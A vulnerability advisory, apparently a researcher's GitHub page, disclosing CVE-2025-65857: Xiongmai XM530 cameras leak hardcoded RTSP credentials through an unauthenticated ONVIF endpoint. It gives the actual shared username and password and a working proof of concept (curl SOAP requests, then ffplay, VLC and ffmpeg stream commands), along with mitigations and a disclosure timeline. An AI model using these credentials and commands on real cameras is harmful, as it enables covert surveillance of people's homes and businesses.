Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

# CVE-2025-65857

**Xiongmai XM530 Xiongmai XM530 IP Camera Hardcoded RTSP Credential Exposure

# CVE-2025-65857

**Xiongmai XM530 IP Camera Hardcoded RTSP Credentials Exposure**

---

## Summary

The GetStreamUri ONVIF endpoint in Xiongmai XM530-series IP cameras exposes RTSP URIs containing hardcoded credentials, enabling direct unauthorized access to live video streams.

**CVE ID:** CVE-2025-65857
**Severity:** CRITICAL
**CVSS v3.1 Score:** 9.1
**CVSS Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H`

### CVSS Breakdown

* **Attack Vector (AV):** Network - Remotely exploitable
* **Attack Complexity (AC):** Low - Credentials hardcoded in all devices
* **Privileges Required (PR):** None - Accessible via CVE-2025-65856
* **User Interaction (UI):** None - Zero-click exploitation
* **Confidentiality:** High - Complete video stream access
* **Integrity:** None - Read-only credential exposure
* **Availability:** High - Potential DoS via stream exhaustion

---

## Affected Products

**Vendor:** Hangzhou Xiongmai Technology Co., Ltd.
**Product:** IP Camera XM530V200_X6-WEQ_8M
**Commercial Brand:** ANBIUX (and hundreds of OEM rebrands)
**Firmware:** V5.00.R02.000807D8.10010.346624.S.ONVIF 21.06 and likely all V5.00.R02.* versions
**Component:** ONVIF Media Service - GetStreamUri endpoint

**Device Context:**
Xiongmai is a major OEM supplier of IP cameras sold under hundreds of brand names globally. These cameras are widely deployed in residential, commercial, and industrial surveillance systems.

---

## Vulnerability Details

The `GetStreamUri` ONVIF endpoint returns RTSP URIs with hardcoded credentials embedded directly in the URL.

**Technical Details:**

1. **Hard-coded Credentials (CWE-798)**
* Username: `wphd`
* Password: `2MNswbQ5`
* Identical across all tested devices
* Do not change when admin password is modified

2. **Insufficiently Protected Credentials (CWE-522)**
* Credentials transmitted in plaintext over HTTP
* Embedded in URI format: `rtsp://[IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream`
* No encryption or obfuscation

3. **Combined with CVE-2025-65856:**
* GetStreamUri endpoint accessible without authentication
* Complete zero-click access to live video streams
* No authentication barriers whatsoever

---

## Impact

An unauthenticated remote attacker can:

* Obtain RTSP credentials via unauthenticated ONVIF request
* Access live video and audio streams directly
* Monitor surveillance feeds in real-time
* Perform mass surveillance (credentials work across all devices)
* Violate privacy of camera subjects

**Privacy Impact:**
* Critical violation of GDPR and privacy regulations
* Enables targeted surveillance and stalking
* Mass surveillance operations feasible
* No user notification of unauthorized access

**Real-world Scenarios:**
* Home surveillance cameras monitored by strangers
* Business security feeds accessible to competitors
* Residential privacy completely compromised

---

## Proof of Concept

**Step 1: Obtain Valid Profile Tokens (No Authentication Required)**

```bash
curl -X POST http://[CAMERA_IP]:8899/onvif/device_service \
-H "Content-Type: application/soap+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body xmlns:trt="http://www.onvif.org/ver10/media/wsdl">
<trt:GetProfiles/>
</s:Body>
</s:Envelope>'
```

**Response includes available profiles:**
- Token `000` - mainStream (3200x1800 H264)
- Token `001` - subStream (800x448 H264)
- Token `002` - snapStream (800x448 JPEG)

**Step 2: Extract RTSP URI with Hardcoded Credentials**

```bash
curl -X POST http://[CAMERA_IP]:8899/onvif/Media \
-H "Content-Type: application/soap+xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body xmlns:trt="http://www.onvif.org/ver10/media/wsdl">
<trt:GetStreamUri>
<trt:StreamSetup>
<tt:Stream xmlns:tt="http://www.onvif.org/ver10/schema">RTP-Unicast</tt:Stream>
<tt:Transport xmlns:tt="http://www.onvif.org/ver10/schema">
<tt:Protocol>RTSP</tt:Protocol>
</tt:Transport>
</trt:StreamSetup>
<trt:ProfileToken>000</trt:ProfileToken>
</trt:GetStreamUri>
</s:Body>
</s:Envelope>'
```

**Response exposes hardcoded credentials:**
```xml
<tt:Uri>rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream</tt:Uri>
```

**Step 3: Access Video Stream Directly**

```bash
# Using ffplay
ffplay "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream"

# Using VLC
vlc "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream"

# Using ffmpeg (recording)
ffmpeg -i "rtsp://[CAMERA_IP]:554/user=wphd_password=2MNswbQ5_channel=0_stream=0&onvif=0.sdp?real_stream" -c copy output.mp4
```

**Result:** Complete access to live video stream with zero authentication in three simple steps.

---

## Mitigation

### For Users (Immediate):

* **Network Isolation:** Place cameras on isolated VLAN with no internet access
* **Firewall Rules:** Block all inbound connections to RTSP port 554
* **VPN-Only Access:** Never expose cameras directly to internet
* **Monitor RTSP Connections:** Log and alert on unexpected RTSP sessions
* **Consider Replacement:** Given vendor's security history, replacement strongly recommended

### For Vendor:

* Remove hardcoded credentials from RTSP URIs
* Implement RTSP Digest Authentication (RFC 2617)
* Use session tokens with expiration
* Generate unique credentials per device
* Implement rate limiting on RTSP connections

**No patch currently available.**

---


## Timeline

* **November 2025:** Vulnerability discovered during security assessment
* **December 16, 2025:** CVE-2025-65857 assigned by MITRE
* **December 17, 2025:** Vendor contact attempted via This email address is being protected from spambots. You need JavaScript enabled to view it. (email delivery failed - server misconfigured)
* **December 17, 2025:** Alternative contact attempted via This email address is being protected from spambots. You need JavaScript enabled to view it. (email delivery failed)
* **December 18, 2025:** Public disclosure

**Vendor Response:** No response received. Official security contact infrastructure non-functional.

---

## Credits

**Discovered by:** Luis Miranda Acebedo
**Location:** Vigo, Galicia, Spain
**Contact:** This email address is being protected from spambots. You need JavaScript enabled to view it.

---

## References

* **CVE:** https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-65857
* **Related:** CVE-2025-65856 (ONVIF Authentication Bypass)
* **CWE-798:** https://cwe.mitre.org/data/definitions/798.html
* **CWE-522:** https://cwe.mitre.org/data/definitions/522.html
* **RTSP RFC 2326:** https://tools.ietf.org/html/rfc2326
* **Similar CVE:** CVE-2018-6830 (Foscam - Similar RTSP credential exposure)
* **Vendor History:**
* CVE-2017-16725 (Directory traversal, unpatched)
* CVE-2018-10088 (Authentication bypass, unpatched)
* CVE-2018-17915, 17917, 17919 (XMEye P2P vulnerabilities)
* Mirai botnet contributor (2016)
* SEC Consult Advisory (2018): "Recommend discontinuing Xiongmai products"

This site is open source. [Improve this page](https://github.com/LuisMirandaAcebedo/CVE-2025-65857/edit/main/README.md).